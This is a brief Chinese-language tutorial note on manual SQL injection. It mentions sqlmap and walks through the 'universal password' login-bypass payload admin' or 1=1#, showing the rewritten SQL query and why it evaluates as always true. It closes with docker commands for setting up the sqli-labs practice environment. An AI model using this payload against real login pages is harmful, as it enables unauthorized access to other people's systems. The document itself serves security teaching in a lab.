为什么要学习手工注入?
工具:sqlmap
万能密码,直接登录到后台页面,不需要密码:admin' or 1=1#,当后台存在注入的话,才能使用注入密码,不是所有的网站进行登录。当输入admin,admin,在后台的SQL语句是:
select * from user where username='$user' and password='pass';
提交的代码时,语句是:
select * from user where username='admin' or 1=1#' and password='pass';
输入单引号是将前面的SQL语句,进行闭合,后面的#会将后面的语句注释掉,进行查询是,1=1,是永正的语句,所以在有漏掉的前提下,可以不用密码,就可登陆。
本地搭建(docker):
docker pull c0ny1/sqli-labs
docker run -dt --name sqli-lab -p 8003:80 acgpiano/sqli-labs:latest